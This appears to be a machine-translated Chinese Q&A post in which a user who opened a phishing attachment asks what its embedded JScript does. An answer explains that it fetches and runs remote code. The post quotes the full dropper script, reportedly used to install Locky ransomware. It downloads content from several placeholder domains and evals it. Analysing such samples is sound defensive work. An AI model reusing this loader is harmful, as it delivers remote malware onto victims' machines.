我收到其中一个“联邦快递包裹无法送达,请打开附近的.doc” - 电子邮件。因为我最近在线订购了东西,因为我显然是个白痴,所以我点击了附件。幸运的是我使用的是Linux,因此打开“filename.doc.wsf”没有任何损害。我做了,但是对它包含的以下片段究竟是什么感到好奇。
根据我的谷歌搜索,最终目标是在Windows系统上安装一个名为Locky的恶意软件。恶意软件试图从中下载的不同域列在数组x []中,而for循环中的前几行似乎是从片段构建整个URL。 (我认为它已经被分解以试图避免垃圾邮件检测。)但是从“尝试”开始我不能完全跟踪发生的事情?
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
x[i] = "http://" + x[i];
x[i] += "/co";
x[i] += "unter/";
x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
try {
var z = new ActiveXObject(y);
z.open("GET", x[i], false);
z.send();
if (z.status == 200)
{
eval(z.responseText.split("~").join("a"));
break;
};
}
catch(e) { };
};
</script></job>
答案 0 :(得分:0)
它只是向5个不同的URL发送HTTP get请求,并评估从URL中检索的内容。
这是从PC上的远程位置执行代码的简单方法。您可以在不更改此脚本的情况下更改远程代码,从而使您的逻辑更加灵活。